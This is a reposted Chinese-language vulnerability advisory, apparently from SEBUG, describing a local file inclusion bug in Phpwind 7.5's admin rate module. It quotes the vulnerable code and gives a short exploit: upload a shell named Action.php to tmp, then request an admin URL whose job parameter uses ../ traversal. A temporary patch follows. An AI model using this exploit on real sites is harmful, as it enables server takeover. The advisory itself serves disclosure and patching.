Phpwind7.5 后台本地包含漏洞
2010年2月5日星期五 | | |SSV ID:19065
SEBUG-Appdir:PHPWind
Published:2010-02-05
Vulnerable:
Phpwind7.5
Discription:
文件:hack\rate\admin.php 源码: <?php !function_exists('readover') && exit('Forbidden'); define ( "H_R", R_P . "hack/rate/" ); define ( "L_R", R_P . "lib/" ); InitGP ( array ('ajax' ) ); $action = strtolower ( ($job) ? $job : "admin" ); $filepath = H_R . "action/" . $action . "Action.php"; (! file_exists ( $filepath )) && exit (); if ($job != "ajax") { require H_R . '/template/layout.php'; } else { require_once $filepath; } ?> 再看看hack\rate\template\layout.php: <?php !function_exists('readover') && exit('Forbidden'); include_once PrintEot ( 'left' ); print <<<EOT --> EOT; require_once $filepath; include_once PrintEot ( 'adminbottom' ); ?> $job可以自定义,触发本地包含,只不过addslashes了,因此不能通过%00截断;但可以通过若干///////截断,或者直接在tmp文件夹下写个shell来包含。Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
先在tmp下上传一个shell,名为Action.php 然后访问:http://127.0.0.1/pw /admin.php?adminjob=hack&hackset=rate&typeid=100&job=../../../../../../tmp/
SEBUG Solution:
临时补丁: $filepath = H_R . "action/" . $action . "Action.php"; 替换为: $filepath = Pcv(H_R . "action/" . $action . "Action.php");
// sebug.net [2010-02-05]
谢谢光临本站: http://home.benz.la 共享无限..再次申明 : 此代码含危险性,,请勿从事非法活动.
我的QQ空间
Discuz!7.0-7.2后台settings.inc.php中写shell漏洞
SSV ID:19067SEBUG-Appdir:Discuz!Published:2010-02-05Vulnerab...
博文
